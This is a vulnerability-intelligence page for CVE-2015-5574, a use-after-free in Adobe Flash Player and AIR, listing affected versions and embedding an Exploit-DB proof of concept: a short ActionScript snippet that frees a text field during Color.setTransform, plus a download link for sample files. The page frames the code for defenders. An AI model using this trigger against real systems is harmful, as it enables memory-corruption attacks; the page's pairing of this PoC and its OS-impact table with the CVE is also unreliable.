VIR Vulnerability Intelligence Relay

CVE-2015-5574

critical
Published 2015-09-22 ยท Modified 2026-05-06
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Use-after-free vulnerability in Adobe Flash Player before 18.0.0.241 and 19.x before 19.0.0.185 on Windows and OS X and before 11.2.202.521 on Linux, Adobe AIR before 19.0.0.190, Adobe AIR SDK before 19.0.0.190, and Adobe AIR SDK & Compiler before 19.0.0.190 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5570, CVE-2015-5581, CVE-2015-5584, and CVE-2015-6682.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-39652 dos multiple verified text ยท 1 KB
Google Security Research ยท 2016-04-01

Adobe Flash - Color.setTransform Use-After-Free

text exploit Source: Exploit-DB 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=451

If Color.setTransform is set to a transform that deletes the field it is called on, a UaF occurs. A PoC is as follows:

var tf:TextField = this.createTextField("tf",1,1,1,4,4)

var n = new Object();

n.valueOf = function () {
	trace("here");
	tf.removeTextField()
}

var o = {ra: n, rb:8};

var c = new Color(tf)
c.setTransform(o)


A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39652.zip

OS impact
linux Linux kernel Fixed 1 release
VersionStatusFixed in
โ€” Not affected โ€”
macos macOS Fixed 1 release
VersionStatusFixed in
โ€” Not affected โ€”

Application impact
VendorProductVersionsFixed
adobe adobeflash_player{"endIncluding":"13.0.0.289"}
adobe adobeflash_player14.0.0.125
adobe adobeflash_player14.0.0.145
adobe adobeflash_player14.0.0.176
adobe adobeflash_player14.0.0.179
adobe adobeflash_player15.0.0.152
adobe adobeflash_player15.0.0.167
adobe adobeflash_player15.0.0.189
adobe adobeflash_player15.0.0.223
adobe adobeflash_player15.0.0.239
adobe adobeflash_player15.0.0.246
adobe adobeflash_player16.0.0.235
adobe adobeflash_player16.0.0.257
adobe adobeflash_player16.0.0.287
adobe adobeflash_player16.0.0.296
adobe adobeflash_player17.0.0.134
adobe adobeflash_player17.0.0.169
adobe adobeflash_player17.0.0.188
adobe adobeflash_player17.0.0.190
adobe adobeflash_player17.0.0.191
adobe adobeflash_player18.0.0.160
adobe adobeflash_player18.0.0.194
adobe adobeflash_player18.0.0.203
adobe adobeflash_player18.0.0.209
adobe adobeflash_player18.0.0.232
adobe adobeair{"endIncluding":"18.0.0.143"}
adobe adobeair_sdk{"endIncluding":"18.0.0.199"}
adobe adobeair_sdk_\&_compiler{"endIncluding":"18.0.0.180"}

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.